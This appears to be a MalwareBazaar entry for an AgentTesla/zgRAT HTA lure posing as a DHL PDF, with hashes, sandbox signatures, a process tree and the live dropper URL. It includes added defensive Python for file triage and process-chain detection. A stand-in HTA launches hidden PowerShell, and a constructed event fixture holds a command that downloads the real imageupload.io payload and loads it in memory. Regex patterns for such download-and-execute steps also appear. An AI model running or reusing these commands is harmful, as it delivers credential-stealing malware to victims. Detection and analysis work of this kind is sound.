MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



AgentTesla


Vendor detections: 12



SHA256 hash: fbf768ba44b398c246fc1faa033d3841e66dd799780082cdb61f6a4ba0299a26
SHA3-384 hash: a125aa233d2ad2d31b42406f0b37789fbf0b56424f7932f492c961383119f4f0c1362efd9cbce7d19382d4c8b6a2f65a
SHA1 hash: 6ed55055522fc08ea0b196aaad1fd04f62de174f
MD5 hash: 138c57ecd75c9a9ec08d3e2ba490f4b7
humanhash: kitten-fix-west-rugby
File name: Documento de envio de DHL.pdf.hta
Signature: AgentTesla
File size: 124'660 bytes
First seen: 2023-10-30 18:13:30 UTC
Last seen: Never
File type: HTML Application (hta)
MIME type: text/html
ssdeep: 3072:KG0QfY0+M0AkyTG5T29RTPiTg9dTzTgT4LTmTKgB:KG0QR+M0AS
TLSH: T147C35C1116DFA08D71733F731ADD7AFA8E6FEFE1161A649AB24413038A61E40CE94673
TrID: 66.6% (.TXT) Text - UTF-16 (LE) encoded (2000/1)
      33.3% (.MP3) MP3 audio (1000/1)
Reporter: malwarelabnet
Tags: AgentTesla hta zgRAT
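The file information above carries two triage signals a practitioner would check before detonating anything: the lure name "Documento de envio de DHL.pdf.hta" is a double extension (it looks like a PDF but Windows hands a .hta to mshta.exe, which is why a vendor tagged it "masquerade"), and TrID identifies the content as UTF-16 LE text, which an HTA can legitimately be and which defeats naive ASCII string matching. The following Python is an added example, not MalwareBazaar code and not the sample: it splits the extension chain, detects the text encoding (BOM first, then a zero-high-byte heuristic for BOM-less UTF-16 LE), looks for scripting-host markers inside a decoded HTA body, and computes the four digests the entry lists so a local file can be matched against them. The extension sets and marker list are assumptions chosen for illustration, and the HTA bytes are a constructed stand-in with a placeholder command, not the real payload.

```python
import hashlib
import os

# Assumption: a partial list of extensions that Windows hands to a script host or loader.
EXECUTABLE_EXTENSIONS = {".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".ps1",
                         ".exe", ".scr", ".lnk", ".cmd", ".bat"}
# Assumption: extensions a lure filename uses to look like a harmless document.
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
# Script-host / loader markers worth flagging inside an HTA body (illustrative, not exhaustive).
HTA_MARKERS = ("<script", "activexobject", "wscript.shell", "powershell",
               "-encodedcommand", "frombase64string")


def file_hashes(data: bytes) -> dict:
    """The same four digests MalwareBazaar lists, for matching a local file against the entry."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
    }


def split_extensions(filename: str) -> list:
    """Return every extension in order, e.g. 'a.pdf.hta' -> ['.pdf', '.hta']."""
    exts = []
    base = os.path.basename(filename.replace("\\", "/"))
    while True:
        base, ext = os.path.splitext(base)
        if not ext:
            return exts
        exts.insert(0, ext.lower())


def detect_text_encoding(data: bytes) -> str:
    """BOM check first, then a heuristic for BOM-less UTF-16 LE (high bytes mostly zero)."""
    if data.startswith(b"\xff\xfe"):
        return "utf-16-le-bom"
    if data.startswith(b"\xfe\xff"):
        return "utf-16-be-bom"
    if data.startswith(b"\xef\xbb\xbf"):
        return "utf-8-bom"
    high_bytes = data[1:200:2]
    if len(high_bytes) >= 8 and high_bytes.count(0) > 0.8 * len(high_bytes):
        return "utf-16-le"
    return "unknown"


def decode_text(data: bytes, encoding: str) -> str:
    """'utf-16' honours and strips a BOM; a BOM-less file needs the explicit LE codec."""
    if encoding.startswith("utf-16"):
        return data.decode("utf-16" if encoding.endswith("bom") else "utf-16-le", errors="ignore")
    return data.decode("utf-8", errors="ignore")


def triage(filename: str, data: bytes) -> dict:
    exts = split_extensions(filename)
    final = exts[-1] if exts else ""
    findings = []
    lure = [e for e in exts[:-1] if e in DOCUMENT_EXTENSIONS]
    if final in EXECUTABLE_EXTENSIONS and lure:
        findings.append(f"double-extension masquerade: looks like {lure[-1]} but runs as {final}")
    encoding = detect_text_encoding(data)
    if final == ".hta":
        # Decode before matching: ASCII markers are invisible in raw UTF-16 bytes.
        body = decode_text(data, encoding).lower()
        findings.extend(f"hta contains {m}" for m in HTA_MARKERS if m in body)
    return {"extensions": exts, "encoding": encoding,
            "hashes": file_hashes(data), "findings": findings}


# Constructed stand-in for the lure: an HTA saved as UTF-16 LE with BOM (matching the
# entry's TrID result). This is NOT the real sample; the command is a placeholder.
CONSTRUCTED_HTA = (
    '<html><head><script language="JScript">'
    'new ActiveXObject("WScript.Shell").Run('
    '"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand PLACEHOLDER", 0);'
    "</script></head><body></body></html>"
)
CONSTRUCTED_BYTES = b"\xff\xfe" + CONSTRUCTED_HTA.encode("utf-16-le")
CONSTRUCTED_NAME = "Documento de envio de DHL.pdf.hta"

if __name__ == "__main__":
    import json
    print(json.dumps(triage(CONSTRUCTED_NAME, CONSTRUCTED_BYTES), indent=2))
```

Run it against a real download by replacing the constructed bytes with `open(path, "rb").read()` and comparing `hashes["sha256"]` to the value at the top of this entry; the encoding step matters because grep-style IOC checks on the raw bytes of a UTF-16 HTA find nothing.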

Intelligence


File Origin
# of uploads: 1
# of downloads: 151
Origin country: CA
Vendor Threat Intelligence
Result
Verdict:
Malicious
File Type:
HTA File - Malicious
Behaviour
BlacklistAPI detected
Verdict:
No Threat
Threat level:
  10/10
Confidence:
100%
Tags:
masquerade
Result
Verdict:
MALICIOUS
Result
Threat name:
AgentTesla, zgRAT
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Signature
Antivirus detection for URL or domain
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell download and load assembly
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Generic Downloader
Yara detected zgRAT
Behaviour
Behavior Graph (ID 1334440; sample Documento_de_envio_de_DHL.pdf.hta; start date 30/10/2023; architecture WINDOWS; score 100)

Process tree recovered from the graph:
  mshta.exe (Suspicious powershell command line found; Very long command line found)
    powershell.exe (Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading)
      powershell.exe (Writes to foreign memory regions; Injects a PE file into a foreign processes)
        RegAsm.exe (Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc))
        RegAsm.exe (Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines))
      conhost.exe

Network contacts (made by the second powershell.exe):
  imageupload.io, 172.67.222.26:443 (CLOUDFLARENETUS, United States)
  185.254.37.174:80 (NETERRA-ASBG, Germany)

Graph-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures.
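The sandbox process tree above is the detection surface: mshta.exe spawning powershell.exe with a very long command line, a nested powershell.exe that downloads from imageupload.io and loads code in memory, and RegAsm.exe started from PowerShell as the injection target for the stealer. The following Python is an added example, not the sandbox's or MalwareBazaar's code: it evaluates four rules modelled on the signatures listed for this entry ("mshta spawns powershell", "Very long command line", a simplified "Powershell download and load assembly", and "powershell spawns RegAsm.exe") over process-creation records, and attaches the full ancestry to each alert so an analyst sees the chain, not just one process. The events are constructed from the graph, not real telemetry; the 1000-character threshold and the regular expressions are assumptions to be tuned to your environment.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 or an EDR provides)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Assumption: threshold for the "Very long command line" signature; tune to your fleet.
LONG_CMDLINE = 1000
# Simplified stand-ins for the "Powershell download and load assembly" Sigma logic:
# a remote fetch and an in-memory load in the same command line.
DOWNLOAD_RE = re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I)
LOAD_RE = re.compile(r"reflection\.assembly\]::load|frombase64string|invoke-expression|\biex\b", re.I)


def ancestry(pid: int, index: Dict[int, ProcEvent], limit: int = 16) -> List[str]:
    """Image names from the process up to the root; cycle- and depth-guarded."""
    chain, seen = [], set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen and len(chain) < limit:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = index.get(cur.ppid)
    return chain


def evaluate(events: List[ProcEvent]) -> List[dict]:
    index = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        parent = index.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        hits = []
        if name == "powershell.exe" and pname == "mshta.exe":
            hits.append("mshta_spawns_powershell")
        if len(e.cmdline) > LONG_CMDLINE:
            hits.append("very_long_command_line")
        if name == "powershell.exe" and DOWNLOAD_RE.search(e.cmdline) and LOAD_RE.search(e.cmdline):
            hits.append("powershell_download_and_load_assembly")
        if name == "regasm.exe" and pname == "powershell.exe":
            hits.append("powershell_spawns_regasm")
        for rule in hits:
            alerts.append({"rule": rule, "pid": e.pid, "image": name,
                           "ancestry": ancestry(e.pid, index)})
    return alerts


def triggered(events: List[ProcEvent]) -> Set[Tuple[str, int]]:
    """Convenience view: the set of (rule, pid) pairs that fired."""
    return {(a["rule"], a["pid"]) for a in evaluate(events)}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed events modelled on the sandbox process tree above; not real telemetry.
CONSTRUCTED_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\user\Downloads\Documento de envio de DHL.pdf.hta"'),
    ProcEvent(300, 200, PS, "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + "A" * 1500),
    ProcEvent(400, 300, PS, "powershell.exe -nop -w hidden -c \"[System.Reflection.Assembly]::Load("
                            "(New-Object Net.WebClient).DownloadData("
                            "'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg'))\""),
    ProcEvent(401, 300, r"C:\Windows\System32\conhost.exe", "conhost.exe"),
    ProcEvent(500, 400, REGASM, "RegAsm.exe"),
    ProcEvent(501, 400, REGASM, "RegAsm.exe"),
    # Benign control: an admin script launched from Explorer should raise nothing.
    ProcEvent(600, 100, PS, r"powershell.exe -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for alert in evaluate(CONSTRUCTED_EVENTS):
        print(alert["rule"], alert["pid"], " <- ".join(alert["ancestry"]))
```

The RegAsm.exe rule is the one worth keeping even when the first two stages are obfuscated differently: a .NET registration tool with an empty command line and a PowerShell parent has no legitimate reason to exist, and that is where the credential-theft behaviour listed above runs.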
Threat name:
Script-WScript.Trojan.Heuristic
Status:
Malicious
First seen:
2023-10-30 14:03:13 UTC
File Type:
Text (VBS)
AV detection:
5 of 35 (14.29%)
Threat level:
  2/5
Result
Malware family:
Score:
  10/10
Tags:
family:zgrat rat
Behaviour
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Checks computer location settings
Blocklisted process makes network request
Detect ZGRat V1
ZGRat
Malware Config
Dropper Extraction:
https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
Malware family:
AgentTesla.v4
Verdict:
Malicious
